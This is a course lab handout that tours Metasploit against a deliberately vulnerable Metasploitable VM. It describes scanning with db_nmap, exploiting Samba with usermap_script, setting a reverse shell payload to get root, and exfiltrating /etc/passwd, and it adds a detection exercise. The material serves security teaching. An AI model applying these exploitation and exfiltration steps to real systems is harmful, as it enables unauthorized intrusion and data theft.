Folder: attacks
File: attacks/metasploit.pdf
Follow the partner policy.
This assignment will give you a brief tour of some of the capabilities of Metasploit, a security tool that supports the development and use of vulnerability exploits. Like any tool (e.g. a good sharp knife), Metasploit can be used for good or evil. When we take the perspective of penetration testers interested in helping organizations enhance their security, a tool like Metasploit is invaluable.
Nothing to hand in for this part, but you'll need to understand the material in Part 1 to do Parts 2, 3, and 4.
Launch your virtual machines Fire up VirtualBox and launch both the Kali and Metasploitable VMs. Login to both (recall that the user name and password for Metasploitable are both "msfadmin").
On Metasploitable, run "ifconfig" and check the IP address for eth0. For my setup, it's 10.0.2.4. Doing the same on Kali gives me 10.0.2.15. So every time I mention 10.0.2.4 below, I'm talking about Metasploitable's eth0 IP address, and 10.0.2.15 is my Kali eth0 IP address. If your eth0's are different, adjust your commands in the following stages accordingly.
When you're hunting for vulnerabilities on a target system, you can end up collecting a lot of information. To help you keep track, Metasploit supports a database that automatically populates with what the information you uncover.
To start using the Metasploit database, here's what you do.
Most of the rest of your work will take place in the Metasploit Framework Console, a command-line interface. Just run this in your Kali terminal:
That should give you a "msf6 >" prompt.
(HEY, READ THIS: From here on out, unless I specify otherwise, all commands are to be issued at the msfconsole prompt.)
You can separate your msfconsole and database collections into "workspaces" to help you keep track of different projects. Create a new workspace:
You can take a look at the available workspaces:
or switch between workspaces:
To do an nmap-based host discovery like you did in your first pen-testing assignment, you use "db_nmap" at the Metasploitable prompt. (The beautiful thing about doing this instead of "nmap" at the Linux prompt is that Metasploitable will run the command and store the results in the Metasploit database where you'll be able to retrieve those results easily later.)
Now you can take a look at the hosts discovered:
Suppose you want to do an "aggressive" scan of 10.0.2.4 for open ports and the services running on them.
Once that scan is complete, you can take a look at the services that the scan discovered:
Since we've now learned more about 10.0.2.4 than we knew before, try doing the "hosts" command again. Do you see a change since you last executed "hosts"? (You should. And this illustrates some of the power of having an automatically populated database. You don't have to save the results of db_nmap yourself; Metasploit does it for you.)
Now that you have a list of services on the target machine, you can use that list to investigate possible attacks. There are more sophisticated ways to do this, but let's start simple: we'll search the internet for exploits.
Note that an exploit is a piece of code that runs on our own machine and attempts to take advantage of a bug in some server software to enable us to do something to the target machine. When we run an exploit, we usually provide the exploit with a payload, that is, a piece of software that will run on the target machine to accomplish our goals. A very common (and desirable) payload type is a shell—that is, an interface through which we can execute arbitrary commands on the target system.
In our case, when I ran a port scan on 10.0.2.4 (my Metasploitable's IP address) and then looked at the available services, one of the services I saw was a version of the Samba file server software:
Googling for "Samba smbd 3.X - 4.X workgroup: WORKGROUP vulnerabilities", I found myself at this Rapid7 vulnerability database page (note that Rapid7 owns and maintains the Metasploit project). This page tells me to try the "exploit/multi/samba/usermap_script" module. So:
This causes my msfconsole prompt to reflect the module I'm currently using:
This prompt doesn't mean that I've already launched my attack with this exploit. It just says "you're working on the usermap_script exploit". There are several steps left before I'm ready to actually launch the attack against Metasploitable.
Once I'm using my particular exploit, I need to set up its parameters, known in Metasploit as "options". First step, see what those options are:
This gives me a listing like this:
The RHOST option obviously needs to be set, to tell the exploit what IP address we're attacking. Assuming 10.0.2.4 is my target machine's IP:
Then run "show options" again to see if things are set the way you want them.
Next up, find out what payloads Metasploit has that are compatible with our exploit:
In this case, we get a long list of possible payloads. One of the command-shell payloads listed is "cmd/unix/reverse" (where "reverse" refers to a "reverse TCP shell" in which the payload running on the target machine initiates a TCP connection with our attacking machine rather than the other way around). To set up the payload:
Then see what options the payload requires:
The required option we see now is LHOST. It's possible Metasploit pre-filled LHOST with 10.0.2.15 (Kali's eth0 address). But if LHOST's current setting is blank, do this:
Now we're all set to try out the attack.
Do you get a shell? The exploit's own logging message might tell you yes or no. If you do, it's likely you won't see a prompt. So just try a Unix command like "ls -l" or "pwd" to figure out what directory you're in. You can also try the "whoami" command in this illicit non-prompt prompt. When I do so, I get "root", which tells me that I'm free to wreak a great deal of havoc on the Metasploitable machine.
Metasploitable is set up with a ton of vulnerabilities. Your job for this section is to find a Metasploitable vulnerability that you find interesting, and describe it to me.
When you're choosing your payload for your exploit, I want you to try the exploit with at least two different payloads. Spend a little time exploring the capabilities of your payloads both by experimentation and by reading online so you can describe their differences.
I will also ask you to describe a technique that enables you to "exfiltrate" data from the target machine (Metasploitable) to your attacking machine (Kali). Try, for example, to transfer the file /etc/passwd to your attacking machine. At minimum, this should give you a list of user names found on the target machine.
Your description of your chosen exploit will consist of these parts:
When your payload is running on the target machine and you are doing whatever you're doing, is there a way that your activity might be detected? For Part 3, I want you to describe in concise detail at least one way that you could be spotted.
Hint: I recommend investigating the features of the "ps" command. You can then pretend to be the sysadmin of the target machine by logging in to Metasploitable while on the attacking machine, Metasploit is running an exploit. Then, as sysadmin, can you see in the ps output any evidence of the attacker?
There are other ways to detect attacker activity. I'm happy to hear about any of them in Part 3.
Tell me something you found interesting while you were getting to know Metasploit.
Give me a PDF file named attacks/metasploit.pdf containing:
Thanks so much for being a great group this term. I enjoyed working with you all. Have a wonderful summer, and if you're graduating, congratulations and good luck out there! I love hearing from former students, so if you feel like it, please keep in touch.